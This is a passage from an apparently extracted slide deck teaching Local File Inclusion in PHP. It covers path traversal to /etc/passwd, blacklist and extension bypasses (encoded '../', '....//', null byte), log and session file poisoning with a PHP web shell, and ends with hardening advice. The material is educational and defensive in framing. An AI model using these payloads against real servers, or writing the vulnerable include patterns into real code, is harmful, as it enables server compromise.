  • 10. $ 7absec 1: Basic LFI 2: Explanation – Use Case 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • This restriction can be bypassed by traversing directories using a few ../ before the desired file name. • http://example.com/?file=../../../../../etc/passwd • http://example.com/?file=/../../../../../etc/passwd
  • 11. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: Explanation – Use Case 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Scripts can employ search and replace techniques to avoid path traversals. • $File = str_replace('../', ‘ ', $_GET[‘FileName']);
  • 12. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: Explanation – Use Case 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • This restriction can be bypassed by ….//….//….// • http://example.com/?file=....//....//...//etc/passwd • Bypass via URL encoding ../ == %2e%2e%2f • http://example.com/?file= %2e%2e%2f etc/passwd
  • 13. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: Explanation – Use Case 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Scripts can manually append a .php or any other required extension before including the file • include($_GET['language'] . ".php");
  • 14. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: Explanation – Use Case 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • PHP versions before 5.5 are vulnerable to null byte injection. • Adding a null byte (x00) at the end of the filename should bypass the extension check. • This can be also bypassed with PHP Wrappers. • http://example.com/?file= /etc/passwdx00
  • 15. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • LFI can lead to Remote Code Execution (RCE) under some conditions, resulting in a complete server compromise. • One common way is to poison log files, which are modified based on requests to the webserver.
  • 16. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: Explanation – Use Case B: RCE through PHP Session Files 6: Hardening Techniques • Apache and Nginx maintain various log files such as access.log and error.log. • The access.log file contains information about all requests made to the server and their User-Agent strings. • http://example.com/?file= /var/log/apache2/access.log
  • 17. $ 7absec • The log contains the remote IP address, request page, response code, and the user-agent string. • <?php system($_GET['cmd']); ?> 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: Explanation – Use Case B: RCE through PHP Session Files 6: Hardening Techniques
  • 18. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: Explanation – Use Case 6: Hardening Techniques • Similar to server log files, PHP saves user sessions on disk. • This path is dictated by the session.save_path configuration variable, which is empty by default. • http://example.com/?file= /var/lib/php/sessions/sess_$id
  • 19. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: Explanation – Use Case 6: Hardening Techniques • Injecting PHP web shell into the session log file • http://example.com/?file= <?php system($_GET['cmd']); ?>
  • 20. $ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: 1: Use built-in tool basename() open_basedir display_errors disable functions (system, shell_exec, curl_exec, etc.) 2: Doing the Correct Checks use allow_list instead of deny_list